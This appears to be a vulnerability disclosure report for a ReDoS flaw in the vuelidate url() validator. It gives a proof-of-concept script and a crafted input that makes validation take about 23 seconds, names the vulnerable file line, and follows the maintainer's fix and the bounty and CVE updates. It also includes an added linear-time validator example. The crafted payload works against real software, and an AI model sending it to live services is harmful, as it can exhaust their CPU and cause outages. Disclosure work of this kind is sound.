Inefficient Regular Expression Complexity in vuelidate/vuelidate

Valid

Reported on Sep 1st 2021


✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the @vuelidate/validators package. An attacker who is able to provide crafted input to the url(input) validator may cause an application to consume an excessive amount of CPU, because the validator's regular expression backtracks heavily on such input.

🕵️‍♂️ Proof of Concept

Create the following poc.mjs:

import { url } from '@vuelidate/validators/dist/raw.esm.js';
// Measure how long a single call of the vulnerable url() validator takes on the crafted input.
var time = Date.now();
url('http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.');
var time_cost = Date.now() - time;
console.log("Time taken to validate : " + time_cost + " ms");

Execute the following commands in a terminal:

npm i @vuelidate/validators
node poc.mjs

Check the output:

Time taken to validate : 23153 ms

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. Ideally, validation should complete within 1-10 milliseconds, but in the case above it takes 23 seconds.

📍 Location

url.js#L3
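For contrast with the 23-second PoC run, here is an added example (not vuelidate code, and not the maintainer's fix, which replaces the pattern with dperini's URL regex): a URL check built to keep validation cost linear, plus the same timing measurement the PoC performs. It assumes the application can accept an input length cap (MAX_URL_LENGTH, a constructed value), restricts the scheme to http/https, and leans on Node's WHATWG URL parser with small anchored per-label patterns; isSafeUrl, timeValidation and POC_INPUT are this example's own names, and POC_INPUT is the crafted string from the PoC above.

```javascript
// Added example, not code from vuelidate or from the report above.
// It shows one way to keep URL validation at linear cost:
//   1. reject over-long input before any pattern matching,
//   2. let Node's WHATWG URL parser (linear time) do the structural work,
//   3. apply only small, anchored, non-nested regexes to individual
//      hostname labels, whose length is already bounded.
// All identifiers and limits below are this example's own assumptions.

const MAX_URL_LENGTH = 2048;                       // constructed limit; tune per application
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);
// One DNS label: 1-63 characters, alphanumeric, hyphens only in the middle.
// Anchored and free of nested quantifiers, so backtracking stays bounded.
const LABEL_RE = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;
const DIGITS_RE = /^\d{1,3}$/;
const TLD_RE = /^[a-z]{2,63}$/i;

function isSafeUrl(input) {
  if (typeof input !== 'string' || input.length === 0 || input.length > MAX_URL_LENGTH) {
    return false;                                  // cap enforced before any parsing
  }
  let parsed;
  try {
    parsed = new URL(input);                       // throws on structurally malformed input
  } catch (e) {
    return false;
  }
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) return false;
  if (parsed.hostname.startsWith('[')) return true; // IPv6 literal, already checked by URL
  const labels = parsed.hostname.replace(/\.$/, '').split('.');
  if (labels.length < 2) return false;             // bare names such as "localhost" are refused here
  const isIPv4 = labels.length === 4 && labels.every((l) => DIGITS_RE.test(l));
  if (isIPv4) return true;
  return labels.every((l) => LABEL_RE.test(l)) && TLD_RE.test(labels[labels.length - 1]);
}

// Same measurement the report's PoC performs, returned instead of only printed.
function timeValidation(input) {
  const start = process.hrtime.bigint();
  const ok = isSafeUrl(input);
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  return { ok, ms };
}

// The crafted input from the PoC above, copied verbatim.
const POC_INPUT = 'http://foobar.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.';

const result = timeValidation(POC_INPUT);
console.log('valid=' + result.ok + ' time=' + result.ms.toFixed(2) + ' ms');
```

The length cap is the cheapest defence and is independent of which pattern is used; the per-label patterns are safe because each one is anchored, applied to at most 63 characters, and contains no quantifier nested inside another, so their worst case is linear in the label length rather than exponential in the number of dots.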

ready-research submitted a
2 years ago
We have contacted a member of the vuelidate team and are waiting to hear back 2 years ago
ready-research modified the report 2 years ago
ready-research (Researcher), 2 years ago:

After applying the patch, the output is: Time taken to validate : 4 ms

Z-Old (Admin), 2 years ago:

Hey ready-research, I've emailed the repo's maintainer for you.

ready-research modified the report 2 years ago
Dobromir Hristov validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Dobromir Hristov marked this as fixed with commit 1f0ca3 2 years ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE
Dobromir (Maintainer), 2 years ago:

The fix comes from https://gist.github.com/dperini/729294, but I gave credit to the developer who found the issue.

ready-research (Researcher), 2 years ago:

@Dobromir Thank you so much for the confirmation and credits.

Jamie Slome (Admin), 2 years ago:

CVE published! 🎉

CVE-2021-3794
